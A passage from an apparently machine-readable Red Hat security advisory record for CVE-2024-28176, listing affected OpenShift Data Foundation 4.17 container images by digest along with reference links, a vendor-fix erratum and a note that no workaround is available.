"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-28176", }, { category: "external", summary: "RHBZ#2268820", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2268820", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-28176", url: "https://www.cve.org/CVERecord?id=CVE-2024-28176", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-28176", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-28176", }, { category: "external", summary: "https://github.com/panva/jose/security/advisories/GHSA-hhhv-q57g-882q", url: "https://github.com/panva/jose/security/advisories/GHSA-hhhv-q57g-882q", }, ], release_date: "2024-03-09T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-30T14:25:22+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8676", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options don't meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", 